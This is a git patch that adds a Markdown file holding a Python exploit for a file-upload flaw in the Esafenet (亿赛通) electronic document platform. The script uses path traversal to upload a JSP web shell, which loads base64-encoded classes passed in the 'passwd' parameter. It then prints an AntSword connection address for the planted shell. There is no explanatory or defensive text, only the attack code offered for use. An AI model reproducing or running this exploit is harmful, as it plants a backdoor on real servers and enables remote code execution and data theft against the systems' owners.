From e899ceb9c7960c4168c9a599e2f65b1cfab12e03 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 19 Aug 2023 21:12:38 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E4=BA=BF=E8=B5=9B=E9=80=9A=E7=94=B5?=
 =?UTF-8?q?=E5=AD=90=E6=96=87=E6=A1=A3=E5=B9=B3=E5=8F=B0=E6=96=87=E4=BB=B6?=
 =?UTF-8?q?=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 亿赛通电子文档平台文件上传漏洞.md | 53 +++++++++++++++++++++++++++++++
 1 file changed, 53 insertions(+)
 create mode 100644 亿赛通电子文档平台文件上传漏洞.md

diff --git a/亿赛通电子文档平台文件上传漏洞.md b/亿赛通电子文档平台文件上传漏洞.md
new file mode 100644
index 0000000..cbdc80d
--- /dev/null
+++ b/亿赛通电子文档平台文件上传漏洞.md
@@ -0,0 +1,53 @@
+## 亿赛通电子文档平台文件上传漏洞
+
+```
+import requests
+from urllib.parse import urljoin
+import sys
+payload="/CDGServer3/fileType/importFileType.do?flag=syn_user_policy"
+request_file = {'fileshare':(('/..\..\..\..\webapps\ROOT\\tool.jsp',"""<%!
+    class U extends ClassLoader {
+        U(ClassLoader c) {
+            super(c);
+        }
+        public Class g(byte[] b) {
+            return super.defineClass(b, 0, b.length);
+        }
+    }
+ 
+    public byte[] base64Decode(String str) throws Exception {
+        try {
+            Class clazz = Class.forName("sun.misc.BASE64Decoder");
+            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
+        } catch (Exception e) {
+            Class clazz = Class.forName("java.util.Base64");
+            Object decoder = clazz.getMethod("getDecoder").invoke(null);
+            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
+        }
+    }
+%>
+<%
+    String cls = request.getParameter("passwd");
+    if (cls != null) {
+        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
+    }
+%>"""))}
+def title():
+    print("""
+    亿赛通文件上传
+    """)
+def exp(url):  
+    url1=urljoin(url,payload)
+    req=requests.post(url=url1,files=request_file,verify=False,timeout=5)
+    shell=urljoin(url,"tool.jsp")
+    if(req.text.find("xmlFail")>0):
+        print("成功！")
+        print("蚁剑连接地址%s,密码passwd"%shell)
+if __name__ == '__main__':
+    title
+    if(len(sys.argv) !=2):
+        print("eg:python exp.py url")
+    else:
+        exp(sys.argv[1])
+
+```